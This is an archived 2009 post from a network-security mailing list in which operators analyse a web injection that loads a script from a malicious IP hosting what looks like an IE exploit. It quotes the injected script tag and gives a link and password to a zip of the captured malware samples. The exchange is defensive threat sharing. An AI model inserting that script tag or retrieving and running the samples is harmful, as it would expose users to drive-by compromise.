[nsp-sec] ATTN AS 12553 malware hosting
Mike Tancsa
mike at sentex.net
Wed Apr 8 12:20:23 EDT 2009
At 11:07 AM 4/8/2009, Jose Nazario wrote:
>On Wed, 8 Apr 2009, Mike Tancsa wrote:
>
>><script src = //94.247.2.195 / jquery.js> </script>
>
>despite the following which says its benign:
>
>http://wepawet.cs.ucsb.edu/view.php?hash=8f39008bc3088b58c32e1c6f1559ae50&type=js
>
>phoneyc finds an issue. it leads to:
>
> hxxp://94.247.2.195/news/?id=100
>
>which is doubly encoded and leads to some VBS and some JS that looks
>like an IE exploit. AV did not detect the encoded script with any assistance.
>
>but yes, looks malicious even though wepawet was unable to identify it.
I also found a pdf with more embedded java script as well as a flash
file that it sends to the visitor. None of my AV scanners see
anything wrong with them. If anyone is interested in passing the
files on, they can be found at
http://www.tancsa.com/94.247.2.195.zip
The zip password file is
4sDIe762mghdDHKw
---Mike
More information about the nsp-security
mailing list